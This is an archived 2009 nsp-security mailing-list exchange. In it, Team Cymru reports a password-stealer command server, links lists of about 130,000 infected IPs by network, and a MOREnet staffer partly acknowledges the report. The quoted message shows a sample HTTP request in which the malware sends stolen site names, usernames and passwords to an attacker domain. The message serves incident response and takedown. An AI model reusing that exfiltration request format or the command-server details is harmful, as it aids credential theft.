[nsp-sec] 130K+ Infected Ips on ~3600 ASNs
Young, Beth A.
youngba at more.net
Thu Oct 1 14:40:08 EDT 2009
Partial ACK for 2572.
Of the 4 IP addresses listed, 3 are DNS servers. The other is a NAT address that probably has a DNS server behind it.
Beth
Beth Young, CISSP
MOREnet Security
1-800-509-6673
http://www.more.net/security
> -----Original Message-----
> From: nsp-security-bounces at puck.nether.net [mailto:nsp-security-
> bounces at puck.nether.net] On Behalf Of Stephen Gill
> Sent: Thursday, October 01, 2009 12:48 PM
> To: NSP-SEC List
> Subject: [nsp-sec] 130K+ Infected Ips on ~3600 ASNs
>
> ----------- nsp-security Confidential --------
>
> Hi Team,
>
> This password stealer head end IP appears to be quite busy:
>
> 76.73.37.250
>
> We're working w/ the ISP on takedown, however in the meantime here is a
> list
> of 130K+ infected Ips seen talking to it primarily via TCP 80
> (reporting
> stolen credentials) and UDP 7006 - UDP 7012. I don't anticipate an IP
> takedown to last forver because they can likely re-route via DNS.
>
> ASN list:
> https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt
>
> Infected IP list:
> https://www.cymru.com/nsp-sec/Owned/stealer/
> eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt
>
> Timestamps in UTC.
>
> Some clarification on the formatting:
>
> 3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-
> GATEWAYS -
> Massachusetts Institute of Technology
>
> The timestamp column will begin with a U or a T. U is for UDP, T for
> TCP.
> When possible we've preferred to list out a T if we have seen any TCP
> 80
> traffic from the client IP in question.
>
> It looks like the malware on the client may choose its source IP
> address
> since we noticed some RFC 1918 traffic so it is possible the UDP data
> will
> not match in all cases. I cannot guarantee that the UDP traffic is not
> part
> of some type of actual software but it sure looks suspicious. Here is
> a
> public URL for reference:
>
> http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html
>
> As there is UDP involved we cannot guarantee that there are 0 spoofed
> Ips,
> but on the TCP side that is another matter.
>
> HTTP credential stealing looks something like this:
>
> GET
> /pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USER
> NAME&
> p=STOLEN_PASSWORD HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible).
> Host: hotshows.org.
> .
>
>
> Cheers,
> -- steve
>
> --
> Stephen Gill, Chief Scientist, Team Cymru
> http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
>
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-
> security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
More information about the nsp-security
mailing list